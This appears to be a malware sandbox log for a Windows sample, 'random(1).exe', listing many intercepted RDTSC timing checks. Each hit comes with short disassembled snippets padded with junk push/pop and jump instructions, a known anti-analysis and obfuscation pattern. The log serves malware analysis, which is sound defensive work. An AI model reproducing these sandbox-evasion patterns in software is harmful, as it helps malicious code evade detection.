Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD025 second address: 10DD03D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CCh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD03D second address: 10DD068 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F06D8518555h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD068 second address: 10DD06C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD3E2 second address: 10DD405 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Ch 0x00000007 jmp 00007F06D8518550h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD405 second address: 10DD40B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD40B second address: 10DD428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8518558h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD428 second address: 10DD441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8B4D9D3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD441 second address: 10DD445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10E1FCB second address: 10E1FD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10E22A2 second address: 10E22A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10E255E second address: 10E2562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10E2562 second address: 10E259A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Ch 0x00000007 jnc 00007F06D8518546h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 pushad 0x00000011 jnc 00007F06D851855Dh 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10E26C7 second address: 10E26E9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F06D8B4D9C6h 0x00000008 jmp 00007F06D8B4D9CCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jns 00007F06D8B4D9CCh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10E26E9 second address: 10E26EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10E26EF second address: 10E26F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EBBD1 second address: 10EBBF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c jc 00007F06D8518546h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop esi 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EBBF3 second address: 10EBBFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EBBFB second address: 10EBC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10E9B6D second address: 10E9B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10E9B72 second address: 10E9B7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F06D8518546h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EA0E7 second address: 10EA131 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F06D8B4D9D7h 0x0000000f jmp 00007F06D8B4D9D1h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 ja 00007F06D8B4D9C6h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 jng 00007F06D8B4D9C6h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EA47B second address: 10EA499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F06D8518556h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EAD00 second address: 10EAD05 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EB27F second address: 10EB2A4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F06D8518551h 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F06D851854Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EB2A4 second address: 10EB2AA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EB8A0 second address: 10EB8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jp 00007F06D8518546h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EB8B0 second address: 10EB8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F06D8B4D9C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EB8BC second address: 10EB8C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EB8C2 second address: 10EB8E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jmp 00007F06D8B4D9D7h 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EFBC7 second address: 10EFBCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EFBCB second address: 10EFBD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EEE5A second address: 10EEE5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EEFCD second address: 10EEFE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8B4D9D5h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EEFE7 second address: 10EEFED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EEFED second address: 10EEFF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EF169 second address: 10EF16F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EF2A5 second address: 10EF2CD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F06D8B4D9DBh 0x00000008 jmp 00007F06D8B4D9CFh 0x0000000d jo 00007F06D8B4D9C6h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ebx 0x00000016 jne 00007F06D8B4D9CCh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EF6E5 second address: 10EF6EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EF6EB second address: 10EF6EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EF84C second address: 10EF852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EF852 second address: 10EF87B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F06D8B4D9D3h 0x0000000e jmp 00007F06D8B4D9CEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EF87B second address: 10EF881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EF881 second address: 10EF887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EF887 second address: 10EF88B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EF88B second address: 10EF8AC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F06D8B4D9D3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F06D8B4D9D2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10F465B second address: 10F4660 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10F4660 second address: 10F4696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8B4D9D4h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F06D8B4D9D9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10FAA6D second address: 10FAA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 js 00007F06D8518546h 0x0000000b jmp 00007F06D8518559h 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10FB1BF second address: 10FB1E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jo 00007F06D8B4D9C6h 0x0000000c jp 00007F06D8B4D9C6h 0x00000012 jmp 00007F06D8B4D9D7h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10FC591 second address: 10FC5AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D851854Eh 0x00000009 popad 0x0000000a pop esi 0x0000000b pushad 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 push esi 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10FA455 second address: 10FA45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10FA45B second address: 10FA46B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jp 00007F06D8518546h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11038D0 second address: 11038DA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1110AF7 second address: 1110B12 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F06D851855Dh 0x00000008 jmp 00007F06D8518551h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11106AC second address: 11106B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11106B1 second address: 11106C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F06D8518546h 0x0000000a je 00007F06D8518546h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1046E17 second address: 1046E2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F06D8B4D9D1h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1046E03 second address: 1046E17 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F06D8518546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F06D8518548h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1113F56 second address: 1113F6D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F06D8B4D9D1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1113F6D second address: 1113F75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1113F75 second address: 1113F7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 111B328 second address: 111B347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8518559h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 111B347 second address: 111B355 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 111B355 second address: 111B35B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 111F057 second address: 111F05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 111F05D second address: 111F076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnp 00007F06D8518546h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push ecx 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 111F076 second address: 111F07A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 111F07A second address: 111F07E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 112131C second address: 1121328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F06D8B4D9C6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1121328 second address: 1121337 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1131059 second address: 113105F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 113105F second address: 1131065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11311B7 second address: 11311DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F06D8B4D9D8h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11311DF second address: 11311EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jc 00007F06D8518546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11314ED second address: 11314F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11314F1 second address: 11314F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11314F5 second address: 113152A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8B4D9CFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnc 00007F06D8B4D9D2h 0x00000011 popad 0x00000012 pushad 0x00000013 push edi 0x00000014 jns 00007F06D8B4D9C6h 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 113152A second address: 113153C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D851854Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 113153C second address: 113154E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F06D8B4D9E4h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1132194 second address: 1132198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 113460C second address: 1134616 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F06D8B4D9C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1143BB8 second address: 1143BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F06D8518546h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 115693E second address: 115694C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 115694C second address: 1156970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F06D8518559h 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1156970 second address: 1156974 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1156974 second address: 115697A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11564F0 second address: 11564F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11564F4 second address: 115651E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518559h 0x00000007 jo 00007F06D8518546h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 115651E second address: 1156527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 116B074 second address: 116B078 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 116B32A second address: 116B32E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 116B4DD second address: 116B4E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F06D8518546h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 116B4E8 second address: 116B501 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8B4D9D5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 116B987 second address: 116B98B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 116B98B second address: 116B995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 116BAF7 second address: 116BAFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 116BAFF second address: 116BB22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F06D8B4D9C6h 0x0000000a popad 0x0000000b jmp 00007F06D8B4D9D4h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 116BB22 second address: 116BB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 116BB28 second address: 116BB2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
